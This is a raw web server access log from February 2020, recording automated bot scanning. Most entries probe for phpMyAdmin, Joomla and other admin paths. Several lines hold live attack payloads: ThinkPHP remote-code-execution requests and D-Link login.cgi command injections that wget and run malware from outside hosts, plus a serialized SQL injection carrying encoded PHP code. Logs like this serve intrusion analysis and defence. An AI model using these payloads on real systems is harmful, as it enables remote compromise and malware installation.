31.162.211.96 - - [01/Feb/2020:15:51:02 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.37.56 - - [01/Feb/2020:15:51:12 +0100] "POST /wc.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
106.13.37.56 - - [01/Feb/2020:15:51:40 +0100] "POST /xx.php HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
212.91.246.72 - - [01/Feb/2020:15:51:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:52:04 +0100] "POST /s.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36"
106.13.37.56 - - [01/Feb/2020:15:52:40 +0100] "GET /secure/ContactAdministrators!default.jspa HTTP/1.1" 404 346 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)"
212.91.246.72 - - [01/Feb/2020:15:52:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:53:04 +0100] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)"
106.13.37.56 - - [01/Feb/2020:15:53:04 +0100] "POST /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"
114.166.196.2 - - [01/Feb/2020:15:53:22 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.248.102.144/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
5.251.25.168 - - [01/Feb/2020:15:53:29 +0100] "GET /index.php?s=/index/\think\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://faygox.duckdns.org/thinkphp -O /tmp/.xfck; chmod 777 /tmp/.xfck; /tmp/.xfck' HTTP/1.1" 404 310 "-" "Unstable/2.0"
106.13.37.56 - - [01/Feb/2020:15:53:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [01/Feb/2020:15:53:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:53:56 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
59.21.46.176 - - [01/Feb/2020:15:53:59 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://packetsbins.000webhostapp.com/Dlinkrep.sh%20-O%20-%3E%20/tmp/ff;chmod%20+x%20/tmp/ff;sh%20/tmp/ff%27$ HTTP/1.1" 400 329 "-" "PACKETS/2.0"
106.13.37.56 - - [01/Feb/2020:15:54:20 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [01/Feb/2020:15:54:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:54:52 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
106.13.37.56 - - [01/Feb/2020:15:55:20 +0100] "GET /joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
212.91.246.72 - - [01/Feb/2020:15:55:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:55:44 +0100] "GET /Joomla/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.105 Safari/537.36"
106.13.37.56 - - [01/Feb/2020:15:56:08 +0100] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.1" 404 313 "554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:\"id\";s:3:\"'/*\";s:3:\"num\";s:141:\"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b24524345275d3b6469652f2a2a2f286d6435284449524543544f52595f534550415241544f5229293b2f2f7d7d,0--\";s:4:\"name\";s:3:\"ads\";}554fcae493e564ee0dc75bdf2ebf94ca" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36"
106.13.37.56 - - [01/Feb/2020:15:56:12 +0100] "GET /index.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:12 +0100] "GET /phpmyadmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:12 +0100] "GET /phpMyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:13 +0100] "GET /pmd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:13 +0100] "GET /pma/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:13 +0100] "GET /PMA/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:13 +0100] "GET /PMA2/index.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:13 +0100] "GET /pmamy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:14 +0100] "GET /pmamy2/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:16 +0100] "GET /mysql/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:17 +0100] "GET /admin/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:17 +0100] "GET /db/index.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:17 +0100] "GET /dbadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:18 +0100] "GET /web/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:20 +0100] "GET /admin/pma/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:20 +0100] "GET /admin/PMA/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:20 +0100] "GET /admin/mysql/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:20 +0100] "GET /admin/mysql2/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:21 +0100] "GET /admin/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:21 +0100] "GET /admin/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:21 +0100] "GET /admin/phpmyadmin2/index.php HTTP/1.1" 404 332 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:22 +0100] "GET /mysqladmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:22 +0100] "GET /mysql-admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:22 +0100] "GET /mysql_admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:24 +0100] "GET /phpadmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:24 +0100] "GET /phpAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:24 +0100] "GET /phpmyadmin0/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:24 +0100] "GET /phpmyadmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:25 +0100] "GET /phpmyadmin2/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:25 +0100] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:25 +0100] "GET /phpMyAdmin4.8.0/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:26 +0100] "GET /phpMyAdmin4.8.1/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:26 +0100] "GET /phpMyAdmin4.8.2/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:27 +0100] "GET /phpMyAdmin4.8.3/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:28 +0100] "GET /phpMyAdmin4.8.4/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:28 +0100] "GET /phpMyAdmin4.8.5/index.php HTTP/1.1" 404 330 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:28 +0100] "GET /myadmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:28 +0100] "GET /myadmin2/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:28 +0100] "GET /xampp/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:28 +0100] "GET /phpMyadmin_bak/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:29 +0100] "GET /www/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:29 +0100] "GET /tools/phpMyAdmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:29 +0100] "GET /phpmyadmin-old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:29 +0100] "GET /phpMyAdminold/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:29 +0100] "GET /phpMyAdmin.old/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:30 +0100] "GET /pma-old/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:30 +0100] "GET /claroline/phpMyAdmin/index.php HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:30 +0100] "GET /typo3/phpmyadmin/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:32 +0100] "GET /phpma/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:32 +0100] "GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:32 +0100] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.1" 404 336 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:32 +0100] "GET /phpMyAbmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:32 +0100] "GET /phpMyAdmin__/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:32 +0100] "GET /phpMyAdmin+++---/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:33 +0100] "GET /v/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:33 +0100] "GET /phpmyadm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:33 +0100] "GET /phpMyAdm1n/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:33 +0100] "GET /shaAdmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:33 +0100] "GET /phpMyadmi/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:34 +0100] "GET /phpMyAdmion/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:34 +0100] "GET /s/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:36 +0100] "GET /MyAdmin/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:36 +0100] "GET /phpMyAdmin1/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:36 +0100] "GET /phpMyAdmin123/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:36 +0100] "GET /pwd/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:37 +0100] "GET /phpMyAdmina/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:37 +0100] "GET /phpMydmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:37 +0100] "GET /phpMyAdmins/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:38 +0100] "GET /phpMyAdmin._/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:40 +0100] "GET /phpMyAdmin._2/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:41 +0100] "GET /phpmyadmin2222/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:41 +0100] "GET /phpMyAdmin333/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:41 +0100] "GET /phpmyadmin3333/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:42 +0100] "GET /php2MyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:42 +0100] "GET /phpiMyAdmin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:44 +0100] "GET /phpNyAdmin/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
212.91.246.72 - - [01/Feb/2020:15:56:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
106.13.37.56 - - [01/Feb/2020:15:56:44 +0100] "GET /1/index.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:44 +0100] "GET /download/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:44 +0100] "GET /phpMyAdmin_111/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:45 +0100] "GET /phpmadmin/index.php HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:45 +0100] "GET /321/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:45 +0100] "GET /123131/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:45 +0100] "GET /phpMyAdminn/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:45 +0100] "GET /phpMyAdminhf/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:48 +0100] "GET /sbb/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:49 +0100] "GET /WWW/phpMyAdmin/index.php HTTP/1.1" 404 329 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:52 +0100] "GET /phpMyAdmln/index.php HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:52 +0100] "GET /phpMyAdmin_ai/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:52 +0100] "GET /__phpMyAdmin/index.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:53 +0100] "GET /program/index.php HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:53 +0100] "GET /shopdb/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:53 +0100] "GET /phppma/index.php HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:53 +0100] "GET /phpmy/index.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:53 +0100] "GET /mysql/admin/index.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:53 +0100] "GET /mysql/dbadmin/index.php HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:54 +0100] "GET /mysql/sqlmanager/index.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:54 +0100] "GET /mysql/mysqlmanager/index.php HTTP/1.1" 404 333 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:54 +0100] "GET /wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php HTTP/1.1" 404 364 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:54 +0100] "GET /sqladmin/index.php HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:55 +0100] "GET /sql/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
106.13.37.56 - - [01/Feb/2020:15:56:59 +0100] "GET /SQL/index.php HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0"
